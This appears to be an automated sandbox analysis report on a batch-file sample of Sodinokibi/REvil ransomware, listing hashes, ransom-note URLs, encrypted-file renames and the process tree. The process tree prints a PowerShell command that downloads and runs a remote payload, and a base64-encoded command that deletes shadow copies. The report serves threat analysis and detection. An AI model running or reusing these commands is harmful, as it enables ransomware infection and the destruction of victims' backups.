Analysis
-
max time kernel
132s -
max time network
143s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
29-08-2020 18:10
Static task
static1
Behavioral task
behavioral1
Sample
703f05dca6cfaba3626152c6d4d1fcd6.bat
Resource
win7
Behavioral task
behavioral2
Sample
703f05dca6cfaba3626152c6d4d1fcd6.bat
Resource
win10v200722
General
-
Target
703f05dca6cfaba3626152c6d4d1fcd6.bat
-
Size
220B
-
MD5
0a6ac1495b26f97102dc547e02722707
-
SHA1
a15c39e75f663c0e0ee152ac9c09541ffd6d1221
-
SHA256
25ef88f973e50b6cd72f2dd572618de7302e12a2925429568598205dc85a9585
-
SHA512
04b8fffa2dc6bb4b867392c307ae9472849b6872b8fca42568fec4ee07e76d09f41ff16007725b36a86ce3f45fabd6c5f86ac2ff26c71805cd11213bff539c2a
Malware Config
Extracted
http://185.103.242.78/pastes/703f05dca6cfaba3626152c6d4d1fcd6
Extracted
C:\5i0ubx-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/2122EC22BD4D0BB7
http://decryptor.cc/2122EC22BD4D0BB7
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Blacklisted process makes network request 119 IoCs
Processes:
powershell.exeflow pid process 10 1440 powershell.exe 23 1440 powershell.exe 25 1440 powershell.exe 27 1440 powershell.exe 29 1440 powershell.exe 31 1440 powershell.exe 34 1440 powershell.exe 36 1440 powershell.exe 38 1440 powershell.exe 39 1440 powershell.exe 41 1440 powershell.exe 42 1440 powershell.exe 44 1440 powershell.exe 46 1440 powershell.exe 48 1440 powershell.exe 49 1440 powershell.exe 51 1440 powershell.exe 53 1440 powershell.exe 55 1440 powershell.exe 57 1440 powershell.exe 59 1440 powershell.exe 61 1440 powershell.exe 63 1440 powershell.exe 66 1440 powershell.exe 68 1440 powershell.exe 70 1440 powershell.exe 72 1440 powershell.exe 75 1440 powershell.exe 77 1440 powershell.exe 79 1440 powershell.exe 81 1440 powershell.exe 83 1440 powershell.exe 85 1440 powershell.exe 87 1440 powershell.exe 89 1440 powershell.exe 91 1440 powershell.exe 93 1440 powershell.exe 95 1440 powershell.exe 97 1440 powershell.exe 100 1440 powershell.exe 102 1440 powershell.exe 104 1440 powershell.exe 106 1440 powershell.exe 108 1440 powershell.exe 110 1440 powershell.exe 112 1440 powershell.exe 115 1440 powershell.exe 117 1440 powershell.exe 119 1440 powershell.exe 121 1440 powershell.exe 123 1440 powershell.exe 125 1440 powershell.exe 127 1440 powershell.exe 129 1440 powershell.exe 131 1440 powershell.exe 133 1440 powershell.exe 135 1440 powershell.exe 137 1440 powershell.exe 139 1440 powershell.exe 141 1440 powershell.exe 143 1440 powershell.exe 145 1440 powershell.exe 146 1440 powershell.exe 147 1440 powershell.exe -
Modifies extensions of user files 9 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
powershell.exedescription ioc process File renamed C:\Users\Admin\Pictures\EnableSelect.tif => \??\c:\users\admin\pictures\EnableSelect.tif.5i0ubx powershell.exe File renamed C:\Users\Admin\Pictures\MeasureInitialize.png => \??\c:\users\admin\pictures\MeasureInitialize.png.5i0ubx powershell.exe File opened for modification \??\c:\users\admin\pictures\MountEdit.tiff powershell.exe File renamed C:\Users\Admin\Pictures\DebugPublish.tif => \??\c:\users\admin\pictures\DebugPublish.tif.5i0ubx powershell.exe File renamed C:\Users\Admin\Pictures\OutWrite.png => \??\c:\users\admin\pictures\OutWrite.png.5i0ubx powershell.exe File renamed C:\Users\Admin\Pictures\ReadSkip.tif => \??\c:\users\admin\pictures\ReadSkip.tif.5i0ubx powershell.exe File renamed C:\Users\Admin\Pictures\SuspendPop.raw => \??\c:\users\admin\pictures\SuspendPop.raw.5i0ubx powershell.exe File renamed C:\Users\Admin\Pictures\ApproveGet.crw => \??\c:\users\admin\pictures\ApproveGet.crw.5i0ubx powershell.exe File renamed C:\Users\Admin\Pictures\MountEdit.tiff => \??\c:\users\admin\pictures\MountEdit.tiff.5i0ubx powershell.exe -
Enumerates connected drives 3 TTPs
-
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\CatRoot2\dberr.txt powershell.exe -
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\460.bmp" powershell.exe -
Drops file in Program Files directory 13 IoCs
Processes:
powershell.exedescription ioc process File created \??\c:\program files\5i0ubx-readme.txt powershell.exe File opened for modification \??\c:\program files\CompressMeasure.dot powershell.exe File opened for modification \??\c:\program files\ConvertToAssert.ini powershell.exe File opened for modification \??\c:\program files\ReadUnregister.avi powershell.exe File opened for modification \??\c:\program files\ReceiveSuspend.i64 powershell.exe File opened for modification \??\c:\program files\RenameUninstall.au powershell.exe File opened for modification \??\c:\program files\RestartExit.vstm powershell.exe File opened for modification \??\c:\program files\SwitchProtect.mp3 powershell.exe File opened for modification \??\c:\program files\UninstallRepair.3gp powershell.exe File opened for modification \??\c:\program files\UpdatePop.dwg powershell.exe File opened for modification \??\c:\program files\WatchWait.css powershell.exe File created \??\c:\program files (x86)\5i0ubx-readme.txt powershell.exe File opened for modification \??\c:\program files\ReadJoin.bat powershell.exe -
Drops file in Windows directory 1 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\ServiceProfiles\LocalService\winhttp\cachev3.dat svchost.exe -
Modifies data under HKEY_USERS 6 IoCs
Processes:
svchost.exedescription ioc process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad svchost.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7 svchost.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecisionReason = "1" svchost.exe Set value (data) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecisionTime = d0062de1407ed601 svchost.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecision = "0" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections svchost.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exepid process 1440 powershell.exe 1440 powershell.exe 1440 powershell.exe 1440 powershell.exe 1440 powershell.exe 2052 powershell.exe 2052 powershell.exe 2052 powershell.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
Processes:
svchost.exepowershell.exepowershell.exevssvc.exedescription pid process Token: SeShutdownPrivilege 3584 svchost.exe Token: SeCreatePagefilePrivilege 3584 svchost.exe Token: SeDebugPrivilege 1440 powershell.exe Token: SeDebugPrivilege 1440 powershell.exe Token: SeDebugPrivilege 2052 powershell.exe Token: SeBackupPrivilege 2208 vssvc.exe Token: SeRestorePrivilege 2208 vssvc.exe Token: SeAuditPrivilege 2208 vssvc.exe Token: SeTakeOwnershipPrivilege 1440 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 408 wrote to memory of 1440 408 cmd.exe powershell.exe PID 408 wrote to memory of 1440 408 cmd.exe powershell.exe PID 408 wrote to memory of 1440 408 cmd.exe powershell.exe PID 1440 wrote to memory of 2052 1440 powershell.exe powershell.exe PID 1440 wrote to memory of 2052 1440 powershell.exe powershell.exe PID 1440 wrote to memory of 2052 1440 powershell.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\703f05dca6cfaba3626152c6d4d1fcd6.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:408 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/703f05dca6cfaba3626152c6d4d1fcd6');Invoke-EQAQDZNHEGRIN;Start-Sleep -s 10000"2⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1440 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2052
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3584
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:2208